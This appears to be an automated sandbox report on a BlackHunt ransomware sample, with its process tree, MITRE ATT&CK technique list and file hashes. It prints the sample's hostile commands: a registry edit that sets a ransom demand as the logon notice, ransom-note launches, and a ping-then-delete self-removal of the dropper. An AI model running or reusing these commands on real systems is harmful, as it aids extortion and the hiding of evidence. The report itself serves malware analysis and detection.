C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:13568
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:23504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:21528
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:21772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:11700
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:21832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:23252 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:25884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 25884 -s 14444⤵
- Program crash
PID:21264
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe"2⤵PID:21536
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:21760
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9132
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:14220
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7244
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:29128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 25884 -ip 258841⤵PID:25988
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52cb51dcc5a09bea122b1b29e392ead43
SHA1d494af274d8de09e384ea76bc4e24c26f7c9df54
SHA2560f35cb82ac81ebbe16b89147d02d3bba2e1d5c4d1d1d082935b83965cf64f4f0
SHA512227cf08502c9fd7d3e75a16dda8ffa3c8e91f18cae4afc3da25cb4b1e0b5a5cc36157212b8f4791d88f31587f090d440fa04bde2ae15e94c6f3668e957a0f264
-
Filesize
12KB
MD57980bf363274eceb2375fe8abb938b44
SHA14978d14964de60408ff93ef2cc79d3e222045b01
SHA256beb7b1b3eb717d846ea5506cc5484f0acd1863e89e4f17e93b583ce1841a259c
SHA512d0c772cb31afd1625dbc5d933b943dd6913d3f6c36293c4627d5ac183b933c1de5708c64811d7274fc61245abbfafb497888ea8855f2c9218db8d57f9bc2bee4
-
Filesize
684B
MD52760c12ca864160403a3bd1c5c32c63e
SHA15835fdf7945ddbbd036c76674c4fca018e9c3f02
SHA256008c8ca23ff12d9f29a5d06e0dbd055f2f65dc87554a885c276330d9de2cfb2e
SHA51204a8609031045e5143d0ae7eaee62dd043e025ad5944a49c640cafdd0afdf36dc23ac7e485112d37e6dcc1b373091ead68f7ab1da90d339014638d21a3ccc81b